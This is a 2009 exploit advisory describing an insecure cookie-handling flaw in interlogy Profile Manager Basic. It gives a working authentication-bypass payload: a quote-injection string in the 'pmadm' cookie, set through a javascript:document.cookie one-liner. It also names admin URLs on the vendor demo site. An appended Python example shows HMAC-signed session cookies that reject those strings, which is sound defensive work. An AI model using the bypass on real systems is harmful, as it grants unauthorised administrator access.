[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06/06/2009
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~]
[~] N0T: Kpss AnanI ....
[~] -----------------------------------------------------------

desc:

A normal login sets this cookie:

pmadm=dGVzdA;

If I change the end of the value to anything else:

pmadm=dGVzd(write anything);

for example:

pmadm=dGVzdz; or pmadm=dGVzd123231212313;

the login is not accepted.

But if I do this:

pmadm=dGVzd ' or ';

boom, this logs in :D

exp:

javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";

Then go here:

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp

or

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX and all friends
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-08]
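
Added example (not part of the original advisory and not the vendor's code): one way to handle a session cookie so that the client-supplied value is only checked, never interpreted as an identity or passed into a query. SERVER_KEY, SESSIONS, issue_cookie, verify_cookie and check_advisory_values are assumed names; the sample values are the cookie strings quoted in the advisory.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret that never leaves the server.
SERVER_KEY = secrets.token_bytes(32)
# Assumption: stand-in for a server-side session store (database, cache, ...).
SESSIONS = {}

# Cookie values quoted in the advisory, used here as test input.
ADVISORY_VALUES = ["dGVzdA", "dGVzdz", "dGVzd123231212313", "dGVzd ' or '"]


def _tag(sid: str) -> str:
    """HMAC-SHA256 over the session id, hex encoded."""
    return hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()


def issue_cookie(username: str) -> str:
    """After a successful password check: random id, bound to the user server-side."""
    sid = secrets.token_urlsafe(24)
    SESSIONS[sid] = username
    return f"{sid}.{_tag(sid)}"


def verify_cookie(value: str):
    """Return the username for a valid cookie, otherwise None.

    The value is treated as an opaque token: the signature is checked first,
    then the id is looked up by exact key. Nothing in it is decoded into a
    username or concatenated into a query string.
    """
    sid, sep, tag = value.partition(".")
    if not sep:
        return None
    # Compare as bytes in constant time; bytes also avoids the TypeError that
    # compare_digest raises for non-ASCII str input.
    if not hmac.compare_digest(_tag(sid).encode(), tag.encode()):
        return None
    return SESSIONS.get(sid)


def check_advisory_values() -> dict:
    """Run every cookie string from the advisory through the verifier."""
    return {v: verify_cookie(v) for v in ADVISORY_VALUES}


if __name__ == "__main__":
    print(check_advisory_values())
```

With this scheme a cookie that merely encodes a username, with or without quote characters appended, has no valid signature and is rejected before any lookup takes place.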